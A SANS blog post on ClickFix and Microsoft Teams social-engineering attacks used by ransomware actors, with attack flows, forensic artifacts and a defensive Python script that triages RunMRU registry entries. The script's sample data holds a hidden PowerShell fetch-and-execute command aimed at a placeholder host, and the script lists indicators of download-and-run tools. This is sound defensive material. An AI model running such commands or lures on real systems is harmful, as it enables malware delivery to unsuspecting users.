
Stay Ahead of Ransomware: Initial Access via Evolving Social Engineering

Authored by Mari DeGrazia

In the April 2026 edition of the SANS Stay Ahead of Ransomware livestream, SANS instructors and authors Ryan Chapman and Mari DeGrazia delivered an in-depth technical discussion on two increasingly common initial access vectors: ClickFix and Microsoft Teams-based social engineering attacks.

Historically, the big three initial access vectors were phishing, remote access, and software vulnerabilities. However, in the last year, we have seen two techniques that ransomware-adjacent actors have started leveraging more: ClickFix and Microsoft Teams-based attacks. Their effectiveness and increasing use by ransomware operators make them critical threats to understand and defend against.

ClickFix Attacks

In the discussion, Mari covered how ClickFix works, as well as how to detect and prevent the threat. ClickFix emerged around 2024 and saw a 517% increase in 2025. This social engineering technique exploits user trust and unfamiliarity with Windows system functions to execute malicious commands. Unfortunately, the technique proves quite successful, including against organizations with strong user awareness training.

While the discussion focused on Windows, there are also variations that target Mac and Linux systems. Below is a typical ClickFix attack flow in a Windows environment.

  1. Initial Delivery: Victims receive links through compromised email accounts, shared SharePoint documents, compromised websites, SEO poisoning, or some other method. The links often appear to come from trusted sources such as business partners, or are served from a compromised website.
  2. Fake CAPTCHA Page: Users are directed to a page mimicking a verification process, usually asking them to "prove they're human", or telling them something is broken and needs to be fixed ("Click to fix!"), the original style of lure that gives ClickFix its name.
  3. Clipboard Hijacking: JavaScript on the malicious page copies a malicious command to the user's clipboard.
  4. User Execution: Victims are instructed to press Windows+R to open the Windows Run dialog, press Ctrl+V to paste the clipboard contents, and press Enter, supposedly to "prove they are human" or to "fix the problem". What they actually paste and run is the malicious command.
  5. Payload Delivery: The pasted command typically invokes PowerShell (either directly or eventually), which downloads and executes malware, leading to infostealers, backdoors, or ransomware deployment. Malicious commands may also leverage mshta.exe, curl.exe, or other native system tools with the ability to download and execute remote resources.

Detection

There are several artifacts an examiner can check for indications of this attack. Mari walks through each of them in the video and demonstrates some tools you can use to parse them. They include the RunMRU key in the registry (which records what was typed into the Run dialog), the Master File Table (MFT), PowerShell event logs, and internet history. She also shared some Sigma rules that can be applied for detection and monitoring.
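As an added example (not code from the livestream or its authors), the script below triages a RunMRU key that was exported with `reg export` to a .reg file: it unescapes the .reg string values, orders the commands by the MRUList value (most recent first), strips the trailing `\1` flag Windows appends, and flags commands that match several ClickFix-style indicators. The sample export and the indicator list are constructed assumptions; tune the indicators to your environment.

```python
import re

# Constructed sample of a `reg export` of a user's RunMRU key (not real data).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="mstsc\\1"
"c"="powershell -w hidden -ep bypass -c \"irm http://example.invalid/verify | iex\"\\1"
"MRUList"="cba"
'''

# Substrings commonly seen in ClickFix Run-dialog commands (assumed list; extend as needed).
INDICATORS = ("powershell", "pwsh", "mshta", "curl", "certutil", "bitsadmin",
              "-w hidden", "-windowstyle", "-enc", "-ep bypass", "iex",
              "invoke-expression", "irm ", "iwr ", "http")

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def unescape_reg(s: str) -> str:
    """Undo .reg escaping: backslash followed by any char yields that char (\\ -> \, \" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_runmru(reg_text: str) -> list[str]:
    """Return the Run-dialog commands, most recent first, without the trailing '\\1' flag."""
    values = {}
    for line in reg_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:
            values[m["name"]] = unescape_reg(m["data"])
    order = values.get("MRUList", "")          # e.g. "cba": slot c is the most recent
    return [values[slot].removesuffix("\\1") for slot in order if slot in values]


def score(command: str) -> list[str]:
    """Indicators present in one command, matched case-insensitively."""
    lowered = command.lower()
    return [ind for ind in INDICATORS if ind in lowered]


def triage(reg_text: str, min_hits: int = 2) -> list[dict]:
    """Flag commands with several indicators, or an unusually long body for a Run dialog."""
    flagged = []
    for cmd in parse_runmru(reg_text):
        hits = score(cmd)
        if len(hits) >= min_hits or len(cmd) > 100:
            flagged.append({"command": cmd, "hits": hits})
    return flagged


if __name__ == "__main__":
    for entry in triage(SAMPLE_REG):
        print(entry["hits"], "=>", entry["command"])
```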

Microsoft Teams-Based Social Engineering

Ryan dived into social engineering attacks conducted through Microsoft Teams. This technique gained prominence through the Black Basta ransomware group in 2024 and combines multiple social engineering elements:

  1. Email Bombing: Threat actors flood the target's inbox with messages to create confusion (though variations seen in late 2025 and here in 2026 may skip this step).
  2. Teams Contact: Threat actors call or message victims via Teams, posing as an IT help desk.
  3. Establishing Trust: "Is your email acting weird? Let me help you fix that." If the email bombing was skipped, threat actors may use another form of manipulation, such as offering seemingly personal information to prove their "authenticity."
  4. Remote Access: Victims are then guided to launch the Windows Quick Assist tool or install a third-party Remote Monitoring and Management (RMM) tool. Examples of such tools are AnyDesk, Atera, Splashtop, ConnectWise/ScreenConnect, and TeamViewer. This hands control to the threat actor under the guise of legitimate IT assistance.

How to Secure Microsoft Teams 

Ryan showed various resources on how organizations can prevent this type of attack, noting that the primary defense is to disable external access to Teams unless it is absolutely necessary. If external communication is required, organizations can use an allow-list approach in which only trusted partner domains are permitted to contact users.

For both ClickFix and MS Teams attacks, training users is paramount.

Learning More and Looking Forward 

To learn more about ClickFix and Microsoft Teams-based attacks, we recommend you watch the April 7, 2026 episode of the SANS Stay Ahead of Ransomware livestream. Ryan also created two cheat sheets filled with links, tips, and tricks for addressing both ClickFix and MS Teams-based initial access threats.

Join us on the first Tuesday of each month at 1:00 PM Eastern for the SANS Stay Ahead of Ransomware livestream. You can also review the SANS Stay Ahead of Ransomware livestream playlist on YouTube.

Remember to check out our upcoming SANS training events, including FOR528: Ransomware and Cyber Extortion, where we dive into the technical details of preventing, detecting, and responding to ransomware and cyber extortion attacks. On the AI side of things, we also have FOR563: Applied AI for Digital Forensics and Incident Response: Leveraging Local Large Language Models, which teaches cyber defenders to leverage AI to aid in DFIR and IR investigations.